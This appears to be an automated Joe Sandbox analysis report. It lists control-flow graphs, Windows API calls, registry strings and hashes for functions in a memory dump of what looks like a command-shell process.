                                                                                      control_flow_graph 579 7ff793755554-7ff7937555b9 call 7ff79375a640 582 7ff7937555bc-7ff7937555e8 RegOpenKeyExW 579->582 583 7ff7937555ee-7ff793755631 RegQueryValueExW 582->583 584 7ff793755887-7ff79375588e 582->584 585 7ff79375f248-7ff79375f24d 583->585 586 7ff793755637-7ff793755675 RegQueryValueExW 583->586 584->582 587 7ff793755894-7ff7937558db time srand call 7ff793758f80 584->587 591 7ff79375f260-7ff79375f265 585->591 592 7ff79375f24f-7ff79375f25b 585->592 588 7ff79375568e-7ff7937556cc RegQueryValueExW 586->588 589 7ff793755677-7ff79375567c 586->589 595 7ff79375f2b6-7ff79375f2bb 588->595 596 7ff7937556d2-7ff793755710 RegQueryValueExW 588->596 593 7ff79375f28b-7ff79375f290 589->593 594 7ff793755682-7ff793755687 589->594 591->586 598 7ff79375f26b-7ff79375f286 _wtol 591->598 592->586 593->588 601 7ff79375f296-7ff79375f2b1 _wtol 593->601 594->588 602 7ff79375f2ce-7ff79375f2d3 595->602 603 7ff79375f2bd-7ff79375f2c9 595->603 599 7ff793755729-7ff793755767 RegQueryValueExW 596->599 600 7ff793755712-7ff793755717 596->600 598->586 607 7ff793755769-7ff79375576e 599->607 608 7ff79375579f-7ff7937557dd RegQueryValueExW 599->608 605 7ff79375571d-7ff793755722 600->605 606 7ff79375f2f9-7ff79375f2fe 600->606 601->588 602->596 604 7ff79375f2d9-7ff79375f2f4 _wtol 602->604 603->596 604->596 605->599 606->599 609 7ff79375f304-7ff79375f31a wcstol 606->609 610 7ff793755774-7ff79375578f 607->610 611 7ff79375f320-7ff79375f325 607->611 612 7ff79375f3a9 608->612 613 7ff7937557e3-7ff7937557e8 608->613 609->611 616 7ff79375f357-7ff79375f35e 610->616 617 7ff793755795-7ff793755799 610->617 614 7ff79375f34b 611->614 615 7ff79375f327-7ff79375f33f wcstol 611->615 620 7ff79375f3b5-7ff79375f3b8 612->620 618 7ff7937557ee-7ff793755809 613->618 619 7ff79375f363-7ff79375f368 613->619 614->616 615->614 616->608 617->608 617->616 623 7ff79375f39a-7ff79375f39d 618->623 624 7ff79375580f-7ff793755813 618->624 621 7ff79375f38e 619->621 622 7ff79375f36a-7ff79375f382 wcstol 619->622 625 7ff79375582c 620->625 626 7ff79375f3be-7ff79375f3c5 620->626 621->623 622->621 623->612 624->623 627 7ff793755819-7ff793755823 624->627 629 7ff79375f3ca-7ff79375f3d1 625->629 630 7ff793755832-7ff793755870 RegQueryValueExW 625->630 626->630 627->620 628 7ff793755829 627->628 628->625 631 7ff79375f3dd-7ff79375f3e2 629->631 630->631 632 7ff793755876-7ff793755882 RegCloseKey 630->632 633 7ff79375f3e4-7ff79375f412 ExpandEnvironmentStringsW 631->633 634 7ff79375f433-7ff79375f439 631->634 632->584 636 7ff79375f428 633->636 637 7ff79375f414-7ff79375f426 call 7ff7937513e0 633->637 634->632 635 7ff79375f43f-7ff79375f44c call 7ff79374b900 634->635 635->632 640 7ff79375f42e 636->640 637->640 640->634
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                      • API String ID: 145004033-3846321370
                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction ID: f1e56129956c445456494d9acf5baf7c64b1fbbc8c684472000762b9549fe907
                                                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction Fuzzy Hash: 6FE1713261DA82C6E7B0AB20E48057AF7A8FB8C755F805536E68F52B54DF7CE544CB20
                                                                                      Function 00007FF7937537D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 821 7ff7937537d8-7ff793753887 GetCurrentThreadId OpenThread call 7ff7937504f4 HeapSetInformation RegOpenKeyExW 824 7ff79375388d-7ff7937538eb call 7ff793755920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff79375e9f8-7ff79375ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff79375ea41-7ff79375ea59 GetThreadLocale 824->828 829 7ff7937538f1-7ff793753913 memset 824->829 825->828 830 7ff79375ea5b-7ff79375ea67 828->830 831 7ff79375ea74-7ff79375ea77 828->831 832 7ff793753919-7ff793753935 call 7ff793754d5c 829->832 833 7ff79375eaa5 829->833 830->831 834 7ff79375ea79-7ff79375ea7d 831->834 835 7ff79375ea94-7ff79375ea96 831->835 841 7ff79375393b-7ff793753942 832->841 842 7ff79375eae2-7ff79375eaff call 7ff793743240 call 7ff793768530 call 7ff793754c1c 832->842 838 7ff79375eaa8-7ff79375eab4 833->838 834->835 837 7ff79375ea7f-7ff79375ea89 834->837 835->833 837->835 838->832 840 7ff79375eaba-7ff79375eac3 838->840 843 7ff79375eacb-7ff79375eace 840->843 847 7ff79375eb27-7ff79375eb40 _setjmp 841->847 848 7ff793753948-7ff793753962 _setjmp 841->848 854 7ff79375eb00-7ff79375eb0d 842->854 844 7ff79375eac5-7ff79375eac9 843->844 845 7ff79375ead0-7ff79375eadb 843->845 844->843 845->838 851 7ff79375eadd 845->851 849 7ff7937539fe-7ff793753a05 call 7ff793754c1c 847->849 850 7ff79375eb46-7ff79375eb49 847->850 853 7ff793753968-7ff79375396d 848->853 848->854 849->825 855 7ff79375eb4b-7ff79375eb65 call 7ff793743240 call 7ff793768530 call 7ff793754c1c 850->855 856 7ff79375eb66-7ff79375eb6f call 7ff7937501b8 850->856 851->832 858 7ff7937539b9-7ff7937539bb 853->858 859 7ff79375396f 853->859 867 7ff79375eb15-7ff79375eb1f call 7ff793754c1c 854->867 855->856 880 7ff79375eb87-7ff79375eb89 call 7ff7937586f0 856->880 881 7ff79375eb71-7ff79375eb82 _setmode 856->881 862 7ff79375eb20 858->862 863 7ff7937539c1-7ff7937539c3 call 7ff793754c1c 858->863 866 7ff793753972-7ff79375397d 859->866 862->847 877 7ff7937539c8 863->877 873 7ff7937539c9-7ff7937539de call 7ff79374df60 866->873 874 7ff79375397f-7ff793753984 866->874 867->862 873->867 889 7ff7937539e4-7ff7937539e8 873->889 874->866 882 7ff793753986-7ff7937539ae call 7ff793750580 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 874->882 877->873 890 7ff79375eb8e-7ff79375ebad call 7ff7937558e4 call 7ff79374df60 880->890 881->880 897 7ff7937539b3 882->897 889->849 894 7ff7937539ea-7ff7937539ef call 7ff79374be00 889->894 902 7ff79375ebaf-7ff79375ebb3 890->902 900 7ff7937539f4-7ff7937539fc 894->900 897->858 900->874 902->849 903 7ff79375ebb9-7ff79375ec24 call 7ff7937558e4 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 call 7ff79374be00 call 7ff793750580 GetConsoleOutputCP GetCPInfo call 7ff7937504f4 902->903 903->890
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                      • API String ID: 2624720099-1920437939
                                                                                      • Opcode ID: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction ID: aa689dcef4715ea118d2ce4aa4cc1af3415a4e338a07633f27a695ea0dd10008
                                                                                      • Opcode Fuzzy Hash: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction Fuzzy Hash: 4BC1AF31E086428AF7B8BB7094C02B8FAA9FF4D755F84413AD90E667A1DF3CA4418770
                                                                                      Function 00007FF79375823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1118 7ff79375823c-7ff79375829b FindFirstFileExW 1119 7ff7937582cd-7ff7937582df 1118->1119 1120 7ff79375829d-7ff7937582a9 GetLastError 1118->1120 1124 7ff793758365-7ff79375837b FindNextFileW 1119->1124 1125 7ff7937582e5-7ff7937582ee 1119->1125 1121 7ff7937582af 1120->1121 1122 7ff7937582b1-7ff7937582cb 1121->1122 1126 7ff79375837d-7ff793758380 1124->1126 1127 7ff7937583d0-7ff7937583e5 FindClose 1124->1127 1128 7ff7937582f1-7ff7937582f4 1125->1128 1126->1119 1129 7ff793758386 1126->1129 1127->1128 1130 7ff793758329-7ff79375832b 1128->1130 1131 7ff7937582f6-7ff793758300 1128->1131 1129->1120 1130->1121 1134 7ff79375832d 1130->1134 1132 7ff793758332-7ff793758353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff793758302-7ff79375830e 1131->1133 1135 7ff793758356-7ff793758363 1132->1135 1136 7ff79375838b-7ff7937583c2 GetProcessHeap HeapReAlloc 1133->1136 1137 7ff793758310-7ff793758313 1133->1137 1134->1120 1135->1137 1138 7ff7937650f8-7ff79376511e GetLastError FindClose 1136->1138 1139 7ff7937583c8-7ff7937583ce 1136->1139 1140 7ff793758327 1137->1140 1141 7ff793758315-7ff793758323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction ID: 5cb93b0c815139a14eb5a2b2fbb0c5163f8c1f1c3d10c3d8db14a94202199cc4
                                                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction Fuzzy Hash: 00515231609B4296E7A4AF25E4C4179FBA8FB5DB91F848131CA1E63350CF3CE9548B60
                                                                                      Function 00007FF793752978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1142 7ff793752978-7ff7937529b6 1143 7ff7937529b9-7ff7937529c1 1142->1143 1143->1143 1144 7ff7937529c3-7ff7937529c5 1143->1144 1145 7ff7937529cb-7ff7937529cf 1144->1145 1146 7ff79375e441 1144->1146 1147 7ff7937529d2-7ff7937529da 1145->1147 1148 7ff7937529dc-7ff7937529e1 1147->1148 1149 7ff793752a1e-7ff793752a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7937529e3-7ff7937529eb 1148->1150 1151 7ff793752a44-7ff793752a5c FindClose 1149->1151 1152 7ff79375e435-7ff79375e439 1149->1152 1150->1147 1153 7ff7937529ed-7ff793752a1c call 7ff793758f80 1150->1153 1154 7ff793752ae3-7ff793752ae5 1151->1154 1155 7ff793752a62-7ff793752a6e 1151->1155 1152->1146 1156 7ff793752aeb-7ff793752b10 _wcsnicmp 1154->1156 1157 7ff79375e3f7-7ff79375e3ff 1154->1157 1159 7ff793752a70-7ff793752a78 1155->1159 1156->1155 1160 7ff793752b16-7ff79375e3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff793752a7a-7ff793752a8d 1159->1162 1160->1155 1160->1157 1162->1146 1164 7ff793752a93-7ff793752a97 1162->1164 1165 7ff793752a9d-7ff793752ade memmove call 7ff7937513e0 1164->1165 1166 7ff79375e404-7ff79375e407 1164->1166 1165->1150 1167 7ff79375e40b-7ff79375e413 1166->1167 1167->1167 1170 7ff79375e415-7ff79375e42b memmove 1167->1170 1170->1152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction ID: 137b81312464587e912c7fe46cf54c87c312066157ef4a3f296ecb72c3305a52
                                                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction Fuzzy Hash: 28511821F0868285EAB4AF2595C42BAE694FB5CBA0FC45236DE6E677D0DF3CE441C710
                                                                                      Function 00007FF793754D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 643 7ff793754d5c-7ff793754e4b InitializeCriticalSection call 7ff7937558e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff793750580 call 7ff793754a14 call 7ff793754ad0 call 7ff793755554 GetCommandLineW 654 7ff793754e4d-7ff793754e54 643->654 654->654 655 7ff793754e56-7ff793754e61 654->655 656 7ff793754e67-7ff793754e7b call 7ff793752e44 655->656 657 7ff7937551cf-7ff7937551e3 call 7ff793743278 call 7ff793754c1c 655->657 663 7ff7937551ba-7ff7937551ce call 7ff793743278 call 7ff793754c1c 656->663 664 7ff793754e81-7ff793754ec3 GetCommandLineW call 7ff7937513e0 call 7ff79374ca40 656->664 663->657 664->663 674 7ff793754ec9-7ff793754ee8 call 7ff79375417c call 7ff793752394 664->674 678 7ff793754eed-7ff793754ef5 674->678 678->678 679 7ff793754ef7-7ff793754f1f call 7ff79374aa54 678->679 682 7ff793754f95-7ff793754fee GetConsoleOutputCP GetCPInfo call 7ff7937551ec GetProcessHeap HeapAlloc 679->682 683 7ff793754f21-7ff793754f30 679->683 688 7ff793754ff0-7ff793755006 GetConsoleTitleW 682->688 689 7ff793755012-7ff793755018 682->689 683->682 685 7ff793754f32-7ff793754f39 683->685 685->682 687 7ff793754f3b-7ff793754f77 call 7ff793743278 GetWindowsDirectoryW 685->687 696 7ff793754f7d-7ff793754f90 call 7ff793753c24 687->696 697 7ff7937551b1-7ff7937551b9 call 7ff793754c1c 687->697 688->689 691 7ff793755008-7ff79375500f 688->691 692 7ff79375507a-7ff79375507e 689->692 693 7ff79375501a-7ff793755024 call 7ff793753578 689->693 691->689 698 7ff7937550eb-7ff793755161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff793755080-7ff7937550b3 call 7ff79376b89c call 7ff79374586c call 7ff793743240 call 7ff793753448 692->699 693->692 709 7ff793755026-7ff793755030 693->709 696->682 697->663 701 7ff793755163-7ff793755167 698->701 702 7ff79375516f 698->702 724 7ff7937550b5-7ff7937550d0 call 7ff793753448 * 2 699->724 725 7ff7937550d2-7ff7937550d7 call 7ff793743278 699->725 701->702 707 7ff793755169-7ff79375516d 701->707 708 7ff793755172-7ff7937551af free call 7ff793758f80 702->708 707->702 707->708 713 7ff793755075 call 7ff79376cff0 709->713 714 7ff793755032-7ff793755059 GetStdHandle GetConsoleScreenBufferInfo 709->714 713->692 717 7ff79375505b-7ff793755067 714->717 718 7ff793755069-7ff793755073 714->718 717->692 718->692 718->713 729 7ff7937550dc-7ff7937550e6 GlobalFree 724->729 725->729 729->698
                                                                                      APIs
                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754D9A
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DBB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DCA
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DE0
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DEE
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E04
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750589
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF79375059E
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505AF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF7937505C5
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505EF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF793750605
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750632
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF793750647
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                        • Part of subcall function 00007FF793754AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
                                                                                        • Part of subcall function 00007FF793754AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793755554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF793754E35), ref: 00007FF7937555DA
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755623
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755667
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF7937556BE
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755702
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E35
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E81
                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F69
                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F95
                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FB0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FC1
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FD8
                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FF8
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755037
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375504B
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550DF
                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550F2
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375510F
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755130
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375514A
                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755175
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                      • API String ID: 1049357271-3021193919
                                                                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction ID: c112c52ef1ec8d21919dcb0b537597efa9e3325dcbee75d4cbb59cbde2239fc3
                                                                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction Fuzzy Hash: 33C17421A08A4296FAA4BB31A8D01B9F7A9FF4DB91F854135D90F277A1DF3CA5058370
                                                                                      Function 00007FF793753C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
